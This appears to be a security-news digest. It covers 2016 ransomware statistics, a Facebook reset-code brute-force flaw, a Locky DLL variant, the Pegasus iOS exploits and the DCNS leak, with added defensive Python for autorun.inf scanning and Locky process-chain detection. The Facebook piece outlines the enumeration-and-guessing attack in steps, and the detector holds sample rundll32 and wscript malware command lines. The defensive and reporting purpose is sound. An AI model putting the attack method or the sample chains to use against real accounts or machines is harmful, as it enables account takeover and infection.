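SAMPLE_BENIGN = """[autorun]
icon=drive.ico
label=Backup Drive
"""


def parse_autorun(text):
    """Return {key: value} for the [autorun] section with lower-cased keys.
    autorun.inf is INI-like; garbage or a missing section yields {}."""
    cp = configparser.RawConfigParser(strict=False, allow_no_value=True,
                                      delimiters=("=",))
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    for section in cp.sections():
        if section.lower() == "autorun":
            return {k.lower(): (v or "") for k, v in cp.items(section)}
    return {}


def first_token(cmdline):
    """Program part of a command line: honour a leading quoted path."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split()[0] if s else ""


def assess_autorun(text, present_files):
    """Findings for one autorun.inf. present_files: lower-cased Windows-style
    relative paths of files on the volume, so a launch entry that points at a
    real file scores 'high', a dangling one 'medium'."""
    findings = []
    entries = parse_autorun(text)
    for key in LAUNCH_KEYS:
        if not entries.get(key, "").strip():
            continue
        target = first_token(entries[key])
        normalised = str(PureWindowsPath(target)).lower()
        ext = PureWindowsPath(target).suffix.lower()
        exists = normalised in present_files
        if ext in EXEC_EXT:
            severity = "high" if exists else "medium"
        else:
            severity = "low"
        findings.append({"key": key, "target": target, "exists": exists,
                         "severity": severity, "spoofed_action": "action" in entries})
    return findings


def scan_volume(root):
    """Scan a mounted volume (e.g. '/media/usb0' or 'E:\\') for a launching autorun.inf."""
    root = Path(root)
    inf = next((p for p in root.iterdir() if p.name.lower() == "autorun.inf"), None)
    if inf is None:
        return []
    present = {str(PureWindowsPath(p.relative_to(root))).lower()
               for p in root.rglob("*") if p.is_file()}
    return assess_autorun(inf.read_text(errors="replace"), present)


if __name__ == "__main__":
    print("benign   :", assess_autorun(SAMPLE_BENIGN, set()))
    print("malicious:", assess_autorun(SAMPLE_MALICIOUS, {"sys\\invoice.exe"}))
```

Run `scan_volume()` against the mount point of the suspect drive. The `action=` line is reported separately because worms use it to make the AutoPlay dialog read like "Open folder to view files". Note that Windows 7 and later, and XP/Vista after a 2011 update, no longer honour autorun.inf on USB storage at all, so the launch only fires on unpatched or deliberately reconfigured systems; the file is nevertheless a reliable indicator that a worm has written to the drive.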

RAA (Trojan-Ransom.JS.RaaCrypt)

Sometimes we come across cryptors that differ from their peers in terms of functionality, and sometimes an unusual implementation will catch the attention of an analyst. In the case of RAA, the choice of programming language was curious: it was written entirely in JavaScript. The whole body of the program was included in a single .js file delivered to the victim as an attachment in a spam message. When run, it displays a fake error message, and in the meantime, encrypts the user’s files.

Bart (Trojan-Ransom.Win32.Bart)

This cryptor puts the victim’s files in password-protected ZIP archives, generating the passwords with elliptic-curve Diffie-Hellman. The design of the ransom note and the payment site is an exact copy of that used by the notorious Locky.

Satana (Trojan-Ransom.Win32.Satan)

This is a combination of an MBR blocker and a file cryptor, probably inspired by the similar functionality of the notorious Petya + Mischa Trojans. Unlike Petya, Satana does not encrypt the MFT; in fact, its MBR module is obviously incomplete: the routine that checks the password entered by the victim is nothing more than an infinite loop (the original report includes a code fragment demonstrating this).

The number of users attacked by ransomware

Number of users attacked by Trojan-Ransom cryptor malware (Q2 2016)

In Q2 2016, 311,590 unique users were attacked by cryptors, which is 16% less than the previous quarter. Approximately 21% of those attacked were in the corporate sector.

It is important to keep in mind that the real number of incidents is several times higher: the statistics reflect only the results of signature-based and heuristic detections, while in most cases Kaspersky Lab products detect encryption Trojans based on behavior recognition models and issue the Generic verdict, which does not distinguish the type of malicious software.

Top 10 countries attacked by cryptors

Country* % of users attacked by cryptors**
1 Japan 2.40
2 Italy 1.50
3 Djibouti 1.46
4 Luxembourg 1.36
5 Bulgaria 1.34
6 Croatia 1.25
7 Maldives 1.22
8 Korea 1.21
9 Netherlands 1.15
10 Taiwan 1.04
* We excluded those countries where the number of Kaspersky Lab product users is relatively small (less than 10,000).
** Unique users whose computers have been targeted by ransomware as a percentage of all unique users of Kaspersky Lab products in the country.

In Q2, half of the top 10 were European countries – one less than the previous quarter.

Japan, which came ninth in Q1, topped the ranking of countries attacked by cryptors with 2.40%: the most widespread cryptor families in the country were Teslacrypt, Locky and Cryakl.

Newcomers to this ranking were Djibouti (1.46%), Korea (1.21%) and Taiwan (1.04%).

Top 10 most widespread cryptor families

Name Verdict* Percentage of users**
1 CTB-Locker Trojan-Ransom.Win32.Onion/Trojan-Ransom.NSIS.Onion 14.59
2 Teslacrypt Trojan-Ransom.Win32.Bitman 8.36
3 Locky Trojan-Ransom.Win32.Locky 3.34
4 Shade Trojan-Ransom.Win32.Shade 2.14
5 Cryrar/ ACCDFISA Trojan-Ransom.Win32.Cryrar 2.02
6 Cryptowall Trojan-Ransom.Win32.Cryptodef 1.98
7 Cryakl Trojan-Ransom.Win32.Cryakl 1.93
8 Cerber Trojan-Ransom.Win32.Zerber 1.53
9 Scatter Trojan-Ransom.BAT.Scatter/Trojan-Downloader.JS.Scatter/Trojan-Dropper.JS.Scatter/Trojan-Ransom.Win32.Scatter 1.39
10 Rakhni Trojan-Ransom.Win32.Rakhni/Trojan-Downloader.Win32.Rakhni 1.13
* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware.

First place in Q2 was occupied by the CTB-Locker (Trojan-Ransom.Win32/NSIS.Onion) family. In second place was the TeslaCrypt family represented by one verdict: Trojan-Ransom.Win32.Bitman. The Trojan-Ransom.JS.Cryptoload verdict, which in the past downloaded malware and was associated with TeslaCrypt, is no longer characteristic of this family only. TeslaCrypt was earlier a major contributor to the statistics, but fortunately ceased to exist in May 2016 – the owners disabled their servers and posted a master key to decrypt files.

Cerber and Cryrar are the only changes to this ranking compared to the previous quarter.

The Cerber cryptor spreads via spam and exploit kits. The cryptor’s site on the Tor network is translated into lots of languages. Cerber’s special features include the following:

It explores the infected system meticulously: it checks for the presence of an antivirus, whether it is running under a virtual machine (Parallels, VMware, QEMU, VirtualBox) or Wine, and for utilities used by various researchers and analysts (by searching for certain processes and files on disk); it even has a blacklist of system drive serial numbers.
It checks the keyboard layout and the IP address of the infected system. If it detects that the machine is located in a CIS country, it stops infecting it.
It attempts to bypass antivirus protection by terminating their processes, interrupting services, deleting files.
In addition to notifying users about encryption in the form of TXT and HTML files, as is the case with other families, it also runs the VBS script which reproduces the following voice message: “Attention! Attention! Attention! Your documents, photos, databases and other important files have been encrypted!”
The Cryrar cryptor, also known as the Anti Cyber Crime Department of Federal Internet Security Agency (ACCDFISA), Anti-Child Porn Spam Protection, etc., first appeared back in 2012. Its distinctive feature is placing the victim’s files in password-protected self-extracting RAR archives. According to KSN statistics, it shows no signs of conceding its position to newer rivals.

Top 10 countries where online resources are seeded with malware

The following statistics are based on the physical location of the online resources that were used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks.

In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q2 2016, Kaspersky Lab solutions blocked 171,895,830 attacks launched from web resources located in 191 countries around the world. 54,539,948 unique URLs were recognized as malicious by web antivirus components.

81% of notifications about blocked web attacks were triggered by attacks coming from web resources located in 10 countries.

Distribution of web attack sources by country, Q2 2016

The US (35.44%) returned to the top of this ranking in the second quarter. Russia (10.28%) moved up one place to second. The previous quarter’s leader, the Netherlands, dropped to fourth place after its share fell by 17.7 percentage points. Germany completed the Top 3 with a share of 8.9%. Bulgaria left the Top 10, while Canada was a newcomer in ninth place with 0.96%.

Countries where users faced the greatest risk of online infection

In order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.

Country* % of unique users attacked**
1 Azerbaijan 32.10
2 Russia 30.80
3 China 29.35
4 Slovenia 27.54
5 Ukraine 27.46
6 Kazakhstan 27.03
7 Vietnam 26.02
8 Algeria 25.63
9 Armenia 25.09
10 Belarus 24.60
11 Brazil 24.05
12 France 22.45
13 Moldova 22.34
14 Kyrgyzstan 22.13
15 Bulgaria 22.06
16 Italy 21.68
17 Chile 21.56
18 Qatar 20.10
19 India 20.00
20 Portugal 19.84
These statistics are based on the detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (fewer than 10,000 users).
** Unique users whose computers have been targeted by web attacks as a percentage of all unique users of Kaspersky Lab products in the country.

In Q2, Azerbaijan moved up from fourth to first place and became the new leader of this ranking with 32.1%. Russia (30.8%) dropped from first to second, while Kazakhstan (27.03%) fell from second to sixth place.

Since the previous quarter, Spain, Lithuania, Croatia and Turkey have all left the TOP 20. The newcomers to this ranking were Bulgaria (22.06%), Chile (21.56%), Qatar (20.10%) and Portugal (19.84%).


The countries with the safest online surfing environments included Canada (15%), Romania (14.6%), Belgium (13.7%), Mexico (13.2%), the US (12.8%), Switzerland (12.4%), New Zealand (12.1%), the Czech Republic (12%), Argentina (9.9%), Japan (9.5%), the Netherlands (8.3%), Sweden (8.2%) and Germany (8%).

On average, 19.4% of computers connected to the Internet globally were subjected to at least one web attack during the three months. This is a fall of 1.8 p.p. compared to Q1 2016.
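
The per-country rankings in this report (the mobile banker table earlier, the web-attack table above and the local-infection table that follows) share one method: the share of a country's product users who saw a detection, with countries under 10,000 users excluded, and a global figure taken over all users rather than averaged across countries. The following is an added example, not Kaspersky code, that reproduces that method on five constructed countries and shows why it ranks differently from a count of attacked users, and why the global share is not the mean of the country shares.

```python
"""Per-country 'percentage of users attacked' ranking as used in this report.

Added example; the CountryStats values are constructed, not Kaspersky data.
Rules taken from the report's footnotes: share = attacked users / all product
users in the country; countries with fewer than MIN_USERS users are excluded
from the ranking; the global figure is computed over all users."""
from dataclasses import dataclass

MIN_USERS = 10_000   # exclusion threshold stated in the footnotes


@dataclass(frozen=True)
class CountryStats:
    country: str
    users: int      # unique product users seen in the quarter
    attacked: int   # of those, unique users with at least one detection

    @property
    def share(self) -> float:
        """Percentage of this country's users attacked."""
        return 100.0 * self.attacked / self.users if self.users else 0.0


# Constructed telemetry for five hypothetical countries.
SAMPLE = [
    CountryStats("Country A", 2_000_000, 110_000),  # huge user base, low share
    CountryStats("Country B", 50_000, 16_000),      # small base, highest share
    CountryStats("Country C", 6_000, 3_900),        # below MIN_USERS: excluded
    CountryStats("Country D", 800_000, 200_000),    # most attacked users in absolute terms
    CountryStats("Country E", 120_000, 24_000),
]


def rank_by_share(stats, min_users=MIN_USERS, top=10):
    """The report's ranking: by share, ties broken by attacked count, then name."""
    eligible = [s for s in stats if s.users >= min_users]
    eligible.sort(key=lambda s: (-s.share, -s.attacked, s.country))
    return [(i + 1, s.country, round(s.share, 2)) for i, s in enumerate(eligible[:top])]


def rank_by_absolute(stats, top=10):
    """Naive ranking by number of attacked users; rewards large user bases."""
    ordered = sorted(stats, key=lambda s: (-s.attacked, s.country))
    return [(i + 1, s.country, s.attacked) for i, s in enumerate(ordered[:top])]


def global_share(stats):
    """Share over all users worldwide, including countries excluded from the ranking."""
    users = sum(s.users for s in stats)
    attacked = sum(s.attacked for s in stats)
    return round(100.0 * attacked / users, 2) if users else 0.0


def mean_of_shares(stats, min_users=MIN_USERS):
    """Unweighted mean of the eligible country shares; NOT how the global figure is computed."""
    eligible = [s.share for s in stats if s.users >= min_users]
    return sum(eligible) / len(eligible) if eligible else 0.0


if __name__ == "__main__":
    print("by share   :", rank_by_share(SAMPLE))
    print("by absolute:", rank_by_absolute(SAMPLE))
    print("global share %:", global_share(SAMPLE), "mean of shares %:", round(mean_of_shares(SAMPLE), 2))
```

On the constructed data the country with the most attacked users (D) is second by share, the country with the worst share in absolute terms (C) never appears because its user base is too small to be statistically meaningful, and the global share is pulled down by the large, lightly attacked country A. That is the same effect the report describes when it notes that Russia and Germany lead in absolute numbers but Russia alone leads by percentage.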

Local threats

Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q2 2016, Kaspersky Lab’s file antivirus detected 249,619,379 unique malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each of the countries, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.

Top 20 countries with the highest levels of computer infection

Country* % of unique users**
1 Somalia 65.80
2 Vietnam 63.33
3 Tajikistan 62.00
4 Russia 61.56
5 Kyrgyzstan 60.80
6 Bangladesh 60.19
7 Afghanistan 60.00
8 Armenia 59.74
9 Ukraine 59.67
10 Nepal 59.66
11 Ethiopia 59.63
12 Laos 58.43
13 Kazakhstan 57.72
14 Rwanda 57.33
15 Djibouti 56.07
16 Yemen 55.98
17 Venezuela 55.76
18 Algeria 55.58
19 Cambodia 55.56
20 Iraq 55.55
These statistics are based on the detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users’ computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives.

* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (fewer than 10,000 users).
** The percentage of unique users in the country with computers that blocked local threats as a percentage of all unique users of Kaspersky Lab products.

Somalia remained the leader of this ranking in Q2 2016 with 65.8%. Yemen (55.98%) fell from second to sixteenth place, while Vietnam (63.33%) jumped from eighth to second. Tajikistan (62%) rounded off the TOP 3. Russia moved up one place from fifth to fourth, although the figure for that country declined by 2.62 percentage points to 61.56%.

Newcomers to this ranking are Djibouti in fifteenth place (56.07%), Venezuela in seventeenth (55.76%), and Cambodia in nineteenth (55.56%).


The safest countries in terms of local infection risks were Croatia (29%), Singapore (28.4%), Germany (28.1%), Norway (27.6%), the US (27.1%), Switzerland (26.3%), Japan (22.1%), Denmark (21.4%) and Sweden (21.3%).

An average of 43.3% of computers globally faced at least one local threat during Q2 2016, which is 1.2 p.p. less than in the previous quarter.

Hacker reveals How He Could have Hacked Multiple Facebook Accounts
27.8.2016 thehackernews  Hacking
How to Hack a Facebook Account?
That's possibly the most frequently asked question on the Internet today. Though the solution is hard to find, a white hat hacker has just proven how easy it is to hack multiple Facebook accounts with some basic computer skills.
Your Facebook account can be hacked, no matter how strong your password is or how many extra security measures you have taken. No joke!
Gurkirat Singh from California recently discovered a loophole in Facebook's password reset mechanism that could have given hackers complete access to the victim's Facebook account, allowing them to view message conversations and payment card details, post anything and do whatever the real account holder can.
The attack vector is simple, though the execution is quite difficult.
The issue, Gurkirat (@GurkiratSpeca) says, actually resides in the way Facebook allows you to reset your password. The social network uses an algorithm that generates a random 6-digit passcode ‒ that's 10⁶ = 1,000,000 possible combinations ‒ which does not change until it gets 'used' (if you request it from mbasic.facebook.com).
"That could possibly mean that if 1 million people request a password within a short amount of time such that no one uses their code to reset the password, then 1,000,0001 person to request a code will get a passcode that someone from the batch has already been assigned," Gurkirat explains in a blog post.
How to Hack Multiple Facebook Accounts?
Gurkirat first collected valid Facebook IDs by making queries to the Facebook Graph API starting from 100,000,000,000,000, since Facebook IDs are generally 15 digits long, and then visited www.facebook.com/[ID] with a valid ID number in place of [ID].
Once entered, the URL automatically redirected and replaced the Facebook ID with the user's username. In this way, he was first able to build a list of 2 million valid Facebook usernames.
"I first reported this bug on May 3, 2016, but Facebook didn't believe me such large-scale execution could have been possible. They wanted proof," Gurkirat told The Hacker News. "So I spent close to a month learning and building the infrastructure to target a batch of 2 million Facebook users. I then re-submitted this bug, and they agreed that it indeed was an issue."
Then, using a script, hundreds of proxies and random user-agents, Gurkirat automatically initiated password reset requests for those 2 million users, each of whom was assigned a 6-digit password reset code, thus consuming the complete 6-digit range.
Gurkirat then randomly picked a 6-digit number, for example 338625, and started the password reset process using a brute-forcing script against all the usernames in his list, hoping that this number had been assigned by Facebook to someone in his list of 2 million usernames.
Gurkirat actually carried this out and managed to find a valid password reset code and username combination that allowed him to reset the password and hijack a random user's Facebook account.
Although Facebook patched the bug after it was reported by Gurkirat and rewarded him $500 (which seems rather little), Gurkirat doubts that the patch is "strong enough to mitigate this vulnerability."
"I would have never imagined that a company as big as Facebook would be susceptible to sheer computing power. The efficacy of the bug I found relied on just that," Gurkirat told the Hacker News.
"I was informed by Facebook that the patch has been applied and that they have started throttling aggressively per IP address. Given a much larger pool of IP addresses that can simulate a global network flow combined with little social engineering, I still doubt if their patch is strong enough to mitigate this vulnerability."
However, Facebook does provide an extra layer of security to protect your account against such attacks.
Here's how you can protect your Facebook account:
Enable Login Approvals: Users are recommended to enable "Login Approvals" as an extra layer of security in order to protect their Facebook accounts against these kinds of attacks.
With Login Approvals turned ON, Facebook will send you a 6-digit security code via text message to your registered cell phone if someone tries to log into your Facebook account from a new computer, device or web browser.
So, even if an attacker enters your Facebook username and password, that 6-digit security code, which has been delivered to your phone, will still be required to log into your account, preventing the attacker from accessing it.
Enable Login Notification Alerts: Facebook also provides a security feature, "Login Alerts," that sends you an email or SMS whenever it suspects an unauthorized user is accessing your account.
If your Facebook account is accessed from a remote device, Facebook sends you an email or SMS alert. If that is an unauthorized access, you can quickly follow the steps listed in the email to disable access for that device.
Use a Password Manager: It's general, must-do advice to have a strong, unique password for every online account. We have listed some of the best password managers that would help you understand the importance of a password manager and choose a suitable one, according to your requirements.
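The weakness described above comes down to three design choices: a small code space, codes that stay live until used, and no limit on verification attempts across accounts. The following Python model is an added example (not Facebook's implementation or Gurkirat's script); it quantifies the exposure for a given number of live codes and contrasts a reset-code service configured that way with a hardened policy that expires codes, uses a longer code and throttles failed checks per source. All names, defaults and policy values are assumptions.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

# Added example: a simplified reset-code service with two policies. Names,
# defaults and policy parameters are assumptions for illustration only.


def expected_matches(outstanding: int, code_space: int) -> float:
    """Expected number of live codes equal to one fixed guess, when
    `outstanding` codes are live out of `code_space` possible values."""
    return outstanding / code_space


def p_at_least_one_match(outstanding: int, code_space: int) -> float:
    """Probability that one fixed guess equals at least one live code."""
    return 1.0 - (1.0 - 1.0 / code_space) ** outstanding


@dataclass
class ResetPolicy:
    digits: int = 6                      # 6 digits -> 10**6 possible codes
    ttl: Optional[float] = None          # seconds a code stays valid; None: until used
    max_failures: Optional[int] = None   # failed checks per source; None: unlimited


# The configuration the article describes versus a hardened one (assumed values).
VULNERABLE = ResetPolicy(digits=6, ttl=None, max_failures=None)
HARDENED = ResetPolicy(digits=8, ttl=15 * 60, max_failures=10)


@dataclass
class ResetService:
    policy: ResetPolicy
    now: float = 0.0                                          # injectable clock, seconds
    _codes: Dict[str, Tuple[str, float]] = field(default_factory=dict)  # user -> (code, issued_at)
    _failures: Dict[str, int] = field(default_factory=dict)   # source -> failed checks

    def _expired(self, issued_at: float) -> bool:
        ttl = self.policy.ttl
        return ttl is not None and self.now - issued_at > ttl

    def request_reset(self, user: str) -> str:
        """Issue a code for `user`. As the article describes, a live code is
        returned unchanged until it is used (or, under the hardened policy, expires)."""
        entry = self._codes.get(user)
        if entry is not None and not self._expired(entry[1]):
            return entry[0]
        width = self.policy.digits
        code = f"{secrets.randbelow(10 ** width):0{width}d}"
        self._codes[user] = (code, self.now)
        return code

    def verify(self, user: str, guess: str, source: str) -> str:
        """Check a guess from `source`; returns 'ok', 'throttled', 'expired' or 'invalid'."""
        limit = self.policy.max_failures
        if limit is not None and self._failures.get(source, 0) >= limit:
            # Source-level limit: a per-account limit alone cannot stop one guess
            # that is spread across many accounts, one attempt each.
            return "throttled"
        entry = self._codes.get(user)
        if entry is None:
            return self._fail(source)
        code, issued_at = entry
        if self._expired(issued_at):
            del self._codes[user]        # stale codes leave the live pool instead of lingering
            return "expired"
        if not hmac.compare_digest(code, guess):
            return self._fail(source)
        del self._codes[user]            # single use
        return "ok"

    def _fail(self, source: str) -> str:
        self._failures[source] = self._failures.get(source, 0) + 1
        return "invalid"

    def live_codes(self) -> int:
        """Size of the pool that one fixed guess is effectively checked against."""
        return sum(1 for _, t in self._codes.values() if not self._expired(t))


if __name__ == "__main__":
    for policy in (VULNERABLE, HARDENED):
        space = 10 ** policy.digits
        print(f"{policy.digits} digits, 2,000,000 live codes: expected matches "
              f"{expected_matches(2_000_000, space):.2f}, "
              f"P(>=1 match) {p_at_least_one_match(2_000_000, space):.3f}")
```

With 2 million live 6-digit codes a single guess is expected to match two accounts, which is exactly why the time-to-live matters: it caps how many codes can be live at once.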

New Locky Ransomware variant uses DLLs for distribution
27.8.2016 thehackernews Virus

A new Locky ransomware variant has been spotted by researchers at Cyren; it uses DLLs for distribution.
The Locky ransomware has been one of the most prevalent threats since it was first detected in the wild in early 2016. The ransomware has evolved over time: crooks have improved it by adding new detection-evasion features and changing its distribution methods.

Security experts have observed the implementation of sophisticated sandbox-evasion techniques; they documented a new strain of the malware that used a new extension for the encrypted files (the so-called Zepto variant), while another version was able to perform offline encryption.

When it first appeared in the threat landscape, Locky relied on documents for its distribution; later it used malicious macros, JavaScript attachments and also Windows Script (WSF) files.

Recently, experts from the security firm Cyren discovered a new variant that adds a supplementary layer of obfuscation to its downloader script. The new strain of Locky is delivered via spam campaigns; each malicious email includes a ZIP-archived JavaScript file.

“The email being sent in this latest wave, as often before, uses business finance-related topics to lure users into opening its attachment, which is ZIP-archived JavaScript. Comparing this variant to the earlier variants, it has added another layer of obfuscation which decrypts and executes the real Locky downloader script.” states the analysis published by Cyren.


The downloader script works in a way similar to other strains of the Locky ransomware: the downloaded files are decrypted and saved in the Windows Temp directory, but unlike in the past, the malicious payload is a DLL file instead of an .EXE. The DLL is loaded using rundll32.exe, and it uses a custom packer to prevent anti-malware scanners from detecting it.

Once executed, the new Locky ransomware searches the affected system and network shares for files to encrypt; it uses the .zepto extension for locked files. When the encryption process has completed, this variant of Locky drops and displays a ransom payment instruction page.

Researchers noticed that the .onion address provided in the ransom note directs victims to the same Locky decryptor page that has been used in previous campaigns.

“Clicking on the onion link directs the user to the same Locky Decryptor page we have seen in previous Locky waves.” closes the report.
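The execution chain described above (ZIP-archived JavaScript, a DLL dropped in the Temp directory, loaded via rundll32.exe) is a good candidate for a process-creation detection rule. The following Python snippet is an added example, not Cyren's tooling: it runs that logic over constructed sample events shaped like Sysmon process-creation records (the field names are an assumption) and raises the severity when the rundll32 parent is a script host running a .js or .wsf file.

```python
import re
from pathlib import PureWindowsPath
from typing import Dict, List, Optional

# Added example, not Cyren's code. Events below are constructed samples shaped
# like process-creation telemetry (Sysmon event ID 1 style fields, an assumption).
SAMPLE_EVENTS = [
    {"pid": 412, "ppid": 300, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" '
                r'"C:\Users\bob\AppData\Local\Temp\Temp1_invoice.zip\invoice_8731.js"'},
    {"pid": 520, "ppid": 412, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\bob\AppData\Local\Temp\a7Fk3.dll,qwerty"},
    {"pid": 530, "ppid": 100, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},               # benign: not from Temp
    {"pid": 540, "ppid": 200, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'rundll32.exe "C:\Windows\Temp\setup helper.dll",Run'},   # Temp DLL, no script parent
]

TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.IGNORECASE)
SCRIPT_EXT_RE = re.compile(r"\.(?:js|jse|wsf)\b", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def rundll32_module(cmdline: str) -> Optional[str]:
    """Return the module path rundll32 was told to load: the first argument after
    the executable, honouring quotes and stopping at the ',EntryPoint' separator."""
    m = re.match(r'\s*(?:"[^"]*"|\S+)\s+(?:"([^"]+)"|([^\s,]+))', cmdline)
    if not m:
        return None
    return m.group(1) or m.group(2)


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def detect_locky_dll_chain(events: List[Dict]) -> List[Dict]:
    """Flag rundll32.exe loading a DLL out of a Temp directory (medium); raise to
    high when the parent is a script host running a .js/.wsf file, which is the
    downloader chain described for this Locky variant."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if _basename(e["image"]) != "rundll32.exe":
            continue
        module = rundll32_module(e["cmdline"])
        if not module or not TEMP_DIR_RE.search(module):
            continue
        reasons = [f"rundll32 loads DLL from Temp: {module}"]
        parent = by_pid.get(e["ppid"])
        if (parent and _basename(parent["image"]) in SCRIPT_HOSTS
                and SCRIPT_EXT_RE.search(parent["cmdline"])):
            reasons.append(f"parent script host ran: {parent['cmdline']}")
        findings.append({
            "pid": e["pid"],
            "severity": "high" if len(reasons) > 1 else "medium",
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for finding in detect_locky_dll_chain(SAMPLE_EVENTS):
        print(finding["severity"].upper(), finding["pid"], "; ".join(finding["reasons"]))
```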

Secret data on DCNS Scorpene submarines leaked online, it could be a disaster.
27.8.2016 thehackernews Hacking

The Australian newspaper published over 22,000 secret documents on six DCNS Scorpene submarines that are being built in India.
According to The Australian, Indian authorities are investigating a security breach that affected the French submarine firm DCNS, which is 35 percent owned by Thales.
The investigation started after more than 22,000 pages related to six DCNS Scorpene submarines being built in India were leaked.
“DCNS has been made aware of articles published in the Australian press related to the leakage of sensitive data about Indian Scorpene. This serious matter is thoroughly investigated by the proper French national authorities for Defense Security. This investigation will determine the exact nature of the leaked documents, the potential damages to DCNS customers as well as the responsibilities for this leakage.” reads the press information published by the company.

The journalists at The Australian reviewed over 4,450 pages on the Scorpene’s underwater sensors, over 4,300 pages on its combat systems, and 4,200 pages of data on above-water sensors.

DCNS claimed it was the victim of economic cyber espionage; a DCNS spokeswoman told Reuters that the security breach could have a dramatic impact on the company due to the exposure of sensitive information related to the company's collaboration with some governments.

“Asked if the leak could affect other contracts, a company spokeswoman said it had come against a difficult commercial backdrop and that corporate espionage could be to blame.” Reuters reported. “Competition is getting tougher and tougher, and all means can be used in this context,” she said. “There is India, Australia and other prospects, and other countries could raise legitimate questions over DCNS. It’s part of the tools in economic warfare.”

The Australian newspaper published some 22,400 documents containing technical details of six DCNS Scorpene submarines that are being built at a shipyard in Mumbai, India.

“I understand there has been a case of hacking,” Indian Defence Minister Manohar Parrikar told reporters. “We will find out what has happened.”

The DCNS Scorpene submarines are technological jewels; the documents include highly sensitive details of the submarine, including manuals and models of the boat’s antennae.

This new generation of submarines has significant intelligence-gathering capabilities, and it is equipped with advanced combat systems and high-tech communication devices.

As anticipated, the leaked documents also include secret information related to the activities conducted by the French firm with various governments. The leaked files include secret information on sea trials that the Malaysian Navy is conducting with its fleet of DCNS Scorpene submarines. Some documents relate to business with Chile and Russia: in the first case the company provided radar systems for some Chilean frigates, while the Russian government received amphibious assault vessels.

In a brief statement, DCNS said it is aware of the leak on the Indian Scorpenes and noted that the appropriate French authorities are currently investigating the breach. “This investigation will determine the exact nature of the leaked documents, the potential damages to DCNS customers as well as the responsibilities for this leakage.”

The Australian hasn’t revealed the source of the documents but confirmed that the security breach could have serious repercussions on a $38 billion project that DCNS is currently negotiating with the Australian government.

Apple releases 'Emergency' Patch after Advanced Spyware Targets Human Rights Activist
26.8.2016 thehackernews Vulnerebility
Apple has released the iOS 9.3.5 update for iPhones and iPads to patch three zero-day vulnerabilities after a piece of spyware was found targeting the iPhone used by a renowned UAE human rights defender, Ahmed Mansoor.
One of the world's most invasive software weapon distributors, called the NSO Group, has been exploiting three zero-day security vulnerabilities in order to spy on dissidents and journalists.
The NSO Group is an Israeli firm that sells spying and surveillance software that secretly tracks a target's mobile phone.
The zero-day exploits have allowed the company to develop sophisticated spyware tools that can access the device location, contacts, texts, calls logs, emails and even microphone.
Apple fixed these three vulnerabilities within ten days after being informed by two security firms, Citizen Lab and Lookout, who conducted a joint investigation.
Background Story: Malware Discovery
Mansoor, 46, a ‘Martin Ennals Award’ winner from the United Arab Emirates, received a text message on his iPhone on August 10 from an unknown number.
Mansoor found the message suspicious and, knowing that government hackers had already targeted him in the past, forwarded it directly to Citizen Lab researcher Bill Marczak.
Citizen Lab brought in Lookout, a San Francisco mobile security company, to help examine the message.
After analyzing the message content, the researchers found that the link led to a sophisticated piece of malware that exploited three different unknown flaws in Apple’s iOS that would have allowed the attackers to get complete control of Mansoor’s iPhone.

Had those links been clicked, "Mansoor’s iPhone would have been turned into a sophisticated bugging device controlled by UAE security agencies," Citizen Lab explained in a blog post.
"They would have been able to turn on his iPhone’s camera and microphone to record Mansoor and anything nearby, without him being wise about it. They would have been able to log his emails and calls — even those that are encrypted end-to-end. And, of course, they would have been able to track his precise whereabouts."
According to a blog post published by Lookout, the three zero-day flaws, dubbed "Trident" by the firm, involved:
A memory corruption vulnerability in WebKit that could allow hackers to exploit a device when a user clicks on a malicious link.
Two kernel bugs (allowing a device jailbreak) that let an attacker secretly install malware on the victim’s device to carry out surveillance.
Apple released the patch update, iOS 9.3.5, on Thursday, and labeled it "important," advising its users to install the latest version of iOS as soon as possible to protect their devices against these potential security exploits.
You can install the security update over-the-air (OTA) via your iPhone or iPad's settings.

Germany and France declare War on Encryption to Fight Terrorism
26.8.2016 thehackernews Safety
Yet another war on Encryption!
France and Germany are asking the European Union for new laws that would require mobile messaging services to decrypt secure communications on demand and make them available to law enforcement agencies.
French and German interior ministers this week said their governments should be able to access content on encrypted services in order to fight terrorism, the Wall Street Journal reported.
